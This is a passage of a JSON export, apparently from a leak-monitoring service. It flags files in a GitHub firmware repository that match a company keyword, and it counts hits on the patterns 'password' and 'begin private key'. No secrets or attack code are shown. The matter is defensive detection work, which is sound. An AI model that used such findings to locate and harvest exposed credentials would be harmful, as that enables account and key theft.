"https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2fddb61d4c3819547e5b75f47d0d25fa6dc7ed9", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "752909a54ba4a307cfc378fd5d684f8844350a4b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/OS/TaskManager/TaskManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03d3943d397c38da04e243bb254ad1816c48b82f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "321f4ee9985a4cbe47b6f5d726b2038619892635", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/QueueManager/QueueManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/QueueManager/QueueManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a03fda2495554a0d469dba2597b804a3cc9eb3a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "eabe4eeaf27e013ab8f8bf55d00d3ce2b22a6050", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": 
"cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5dee459468203f7f64a3f51530f815efefa32ce2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/SystemControlManager/SystemControlManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/SystemControlManager/SystemControlManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f8ea3160bba241d069f2b75b9cadf771c470422e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + 
"cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a6884161524d8816a8c0e63b1fa2801002670067", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f132712729ac8da9e0856099142918addee0403a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OSConfig/TaskManager/TaskManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" 
+ }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OSConfig/TaskManager/TaskManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c374b2a1dadea76a3c8ab1943e3e51bd399ff07d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "da1448fad155214bd78242f813bffc16619fbf0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + 
"cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a82b2a96e8b268d47f1d9c168e7da1a1c0fc266e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ProtocolsConfig/DALIMessageHandler/DALIMessageHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c9114f8944effde90b37025b139322b764240b1a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + 
} + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c3dff850813cec01ee2231ffa6a8c5ab777f452a", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/DebugManager/DebugManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/DebugManager/DebugManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f01461df25f20aeb39768972c83204386379c990", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + 
"cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6d44144be20f53cf85c849c1d3c13e9e2cda1038", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2b4ca2c4d910c2edb54d45b5d2587d5953a11bb0", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Services/StateExecutionEngine/StateExecutionEngine.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + 
"rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/StateExecutionEngine/StateExecutionEngine.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a562ff0bbe9883f032009c7b7848848761258e4f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "340ef96ad17c275de5e3868fdd3d67a2aadd87be", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": 
"example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "091ebb041384788d677b3e6d864d8f8bce2cf7b8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/CommandHandlers/AsciiCommandHandler/AsciiCommandHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b00fd9faa47a0e87f4c9f6b79a7d5955a9d45074", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/DebugManager/DebugManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, 
+ "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/DebugManager/DebugManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c2afd5748c47cf4242397e03d8d82c16db464028", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ManufInfo/ManufInfo_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ManufInfo/ManufInfo_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "e5dc3ab3034b5035c3892510c6e17292126414c5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5468e3536fa7b3f63c67c1f8ebe32cb062f35a0f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8ab2b9622faff09a1621dafbb147ecf8ba501604", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + 
"data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "704ce46ed4918d3dfb434fb7411dd9c30741c1f6", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "bbbd5900be4a011205fe2ec46f297edffce2a698", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.c", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + 
}, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.c" + } + ], + "id": "e129487e8490976801d5ba2623078387b2cfacb3", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/example/DALILightEngine", + "numberOf": { + "contributors": 1, + "files": 93 + }, + "relations": { + "cyberintegration": "cyberintegration" + }, + "seqUpdate": 1728156880303511, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-03-31T20:52:25+03:00", + "dateDetected": "2024-10-12T14:58:23+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-03-31T22:27:43+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "41dba7b42f66eb72e3a2258cfeb068e7e9b6428c", 
